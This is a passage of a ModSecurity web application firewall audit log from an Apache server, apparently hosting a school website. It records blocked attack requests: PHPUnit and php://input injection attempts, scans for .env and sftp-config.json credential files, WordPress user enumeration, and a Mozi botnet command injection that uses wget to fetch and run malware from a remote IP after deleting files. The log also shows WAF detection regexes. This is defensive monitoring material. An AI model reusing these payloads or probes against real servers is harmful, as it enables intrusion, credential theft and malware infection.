Action: Intercepted (phase 2) Stopwatch: 1749470327491538 2215 (- - -) Stopwatch2: 1749470327491538 2215; combined=1067, p1=337, p2=703, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e599fc2d-Z-- --2def6524-A-- [09/Jun/2025:19:08:27 +0700] aEbOu66OGK25CtJ36rMylwAAAAo 103.236.140.4 50382 103.236.140.4 8181 --2def6524-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 157.66.54.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 157.66.54.166 X-Forwarded-Proto: http Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --2def6524-C-- --2def6524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2def6524-E-- --2def6524-H-- Message: Access denied with code 403 (phase 2). String match " --739de614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --739de614-E-- --739de614-H-- Message: Access denied with code 403 (phase 2). String match " --8ec2960c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ec2960c-E-- --8ec2960c-H-- Message: Access denied with code 403 (phase 2). String match " --4f01bb6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f01bb6b-H-- Message: Access denied with code 403 (phase 2). String match " --4995050d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4995050d-E-- --4995050d-H-- Message: Access denied with code 403 (phase 2). String match " --0b377729-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b377729-E-- --0b377729-H-- Message: Access denied with code 403 (phase 2). 
String match " --2e360623-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e360623-H-- Message: Access denied with code 403 (phase 2). String match " --693b8d0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --693b8d0b-E-- --693b8d0b-H-- Message: Access denied with code 403 (phase 2). String match " --ecc52818-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecc52818-E-- --ecc52818-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749487036746943 5216 (- - -) Stopwatch2: 1749487036746943 5216; combined=3251, p1=522, p2=2690, p3=0, p4=0, p5=39, sr=78, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecc52818-Z-- --bee2df57-A-- [09/Jun/2025:23:46:12 +0700] aEcP1BMDIkuu7kMwm-AlgAAAAJE 103.236.140.4 39764 103.236.140.4 8181 --bee2df57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; PIC-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --bee2df57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bee2df57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749487572577549 817 (- - -) Stopwatch2: 1749487572577549 817; combined=333, p1=294, p2=0, p3=0, p4=0, p5=39, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bee2df57-Z-- --64fb4b20-A-- [10/Jun/2025:00:18:52 +0700] aEcXfE2r5gN9oSasJQzN4AAAANM 103.236.140.4 40072 103.236.140.4 8181 --64fb4b20-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; VTR-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --64fb4b20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64fb4b20-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749489532607442 778 (- - -) Stopwatch2: 1749489532607442 778; combined=324, p1=286, p2=0, p3=0, p4=0, p5=38, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64fb4b20-Z-- --88107340-A-- [10/Jun/2025:00:55:43 +0700] aEcgH2IgvuFVSPOFHr8rrgAAAFY 103.236.140.4 41314 103.236.140.4 8181 --88107340-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.88.142.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.88.142.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --88107340-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88107340-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749491743439214 3550 (- - -) Stopwatch2: 1749491743439214 3550; combined=1456, p1=511, p2=907, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88107340-Z-- --27d14110-A-- [10/Jun/2025:01:05:13 +0700] aEciWRMDIkuu7kMwm-Al1gAAAI0 103.236.140.4 41858 103.236.140.4 8181 --27d14110-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0 Accept-Charset: utf-8 --27d14110-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27d14110-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749492313152341 880 (- - -) Stopwatch2: 1749492313152341 880; combined=338, p1=297, p2=0, p3=0, p4=0, p5=41, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27d14110-Z-- --2a357656-A-- [10/Jun/2025:01:07:38 +0700] aEci6q6OGK25CtJ36rM4wAAAAAw 103.236.140.4 41874 103.236.140.4 8181 --2a357656-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.41.206.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.41.206.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2a357656-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a357656-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749492458579953 2941 (- - -) Stopwatch2: 1749492458579953 2941; combined=1275, p1=430, p2=816, p3=0, p4=0, p5=29, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a357656-Z-- --b5129129-A-- [10/Jun/2025:01:13:21 +0700] aEckQRMDIkuu7kMwm-Al3wAAAJc 103.236.140.4 41908 103.236.140.4 8181 --b5129129-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 85.215.68.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 85.215.68.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b5129129-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5129129-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749492801544889 3260 (- - -) Stopwatch2: 1749492801544889 3260; combined=1383, p1=487, p2=864, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5129129-Z-- --dd90be40-A-- [10/Jun/2025:01:17:04 +0700] aEclIGIgvuFVSPOFHr8ruAAAAEQ 103.236.140.4 41930 103.236.140.4 8181 --dd90be40-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.93.28.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.93.28.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dd90be40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd90be40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749493024884101 3706 (- - -) Stopwatch2: 1749493024884101 3706; combined=1507, p1=504, p2=968, p3=0, p4=0, p5=35, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd90be40-Z-- --52e7211a-A-- [10/Jun/2025:01:43:49 +0700] aEcrZU2r5gN9oSasJQzUYAAAAMw 103.236.140.4 51528 103.236.140.4 8181 --52e7211a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.79.156.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.79.156.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --52e7211a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52e7211a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749494629900863 3189 (- - -) Stopwatch2: 1749494629900863 3189; combined=1386, p1=475, p2=874, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52e7211a-Z-- --f0180114-A-- [10/Jun/2025:02:43:57 +0700] aEc5fU2r5gN9oSasJQzUzQAAAMU 103.236.140.4 53552 103.236.140.4 8181 --f0180114-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0 SeaMonkey/2.21 Accept-Charset: utf-8 --f0180114-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0180114-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749498237004991 732 (- - -) Stopwatch2: 1749498237004991 732; combined=331, p1=291, p2=0, p3=0, p4=0, p5=39, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0180114-Z-- --89434623-A-- [10/Jun/2025:03:06:30 +0700] aEc-xhMDIkuu7kMwm-ArlwAAAJc 103.236.140.4 53800 103.236.140.4 8181 --89434623-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.24.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.24.90 X-Forwarded-Proto: http Connection: close User-Agent: Mozila/5.0 Accept: */* --89434623-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89434623-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749499590078083 998 (- - -) Stopwatch2: 1749499590078083 998; combined=466, p1=422, p2=0, p3=0, p4=0, p5=44, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89434623-Z-- --19569e1b-A-- [10/Jun/2025:03:06:30 +0700] aEc-xhMDIkuu7kMwm-ArmQAAAJc 103.236.140.4 53804 103.236.140.4 8181 --19569e1b-B-- GET /prevlaravel/sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.24.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.24.90 X-Forwarded-Proto: http Connection: close User-Agent: Mozila/5.0 Accept: */* --19569e1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19569e1b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749499590079258 637 (- - -) Stopwatch2: 1749499590079258 637; combined=234, p1=208, p2=0, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19569e1b-Z-- --44001d10-A-- [10/Jun/2025:03:06:30 +0700] aEc-xmIgvuFVSPOFHr8vrgAAAFM 103.236.140.4 53808 103.236.140.4 8181 --44001d10-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.24.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.24.90 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --44001d10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44001d10-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749499590110923 718 (- - -) Stopwatch2: 1749499590110923 718; combined=259, p1=221, p2=0, p3=0, p4=0, p5=38, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44001d10-Z-- --8332b82f-A-- [10/Jun/2025:03:06:30 +0700] aEc-xk2r5gN9oSasJQzU1gAAANY 103.236.140.4 53810 103.236.140.4 8181 --8332b82f-B-- GET /prevlaravel/sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.24.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.24.90 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --8332b82f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8332b82f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749499590112701 770 (- - -) Stopwatch2: 1749499590112701 770; combined=286, p1=254, p2=0, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8332b82f-Z-- --6ba20b5b-A-- [10/Jun/2025:03:24:10 +0700] aEdC6q6OGK25CtJ36rM-HQAAABY 103.236.140.4 54194 103.236.140.4 8181 --6ba20b5b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 35.240.94.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.240.94.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6ba20b5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ba20b5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749500650262031 2168 (- - -) Stopwatch2: 1749500650262031 2168; combined=1136, p1=364, p2=749, p3=0, p4=0, p5=23, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ba20b5b-Z-- --434fc673-A-- [10/Jun/2025:03:31:57 +0700] aEdEvRMDIkuu7kMwm-Ar3QAAAIo 103.236.140.4 54228 103.236.140.4 8181 --434fc673-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 80.78.73.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 80.78.73.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --434fc673-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --434fc673-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749501117459507 3119 (- - -) Stopwatch2: 1749501117459507 3119; combined=1326, p1=453, p2=841, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --434fc673-Z-- --c7951061-A-- [10/Jun/2025:03:44:22 +0700] aEdHppSz29O8wd7wtMvGGwAAAIQ 103.236.140.4 56076 103.236.140.4 8181 --c7951061-B-- GET /shell?cd+/tmp;rm+-rf+*;wget+http://39.71.37.34:38505/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 39.71.37.34 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 39.71.37.34 X-Forwarded-Proto: http Connection: close User-Agent: Hello, world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 --c7951061-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7951061-E-- --c7951061-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
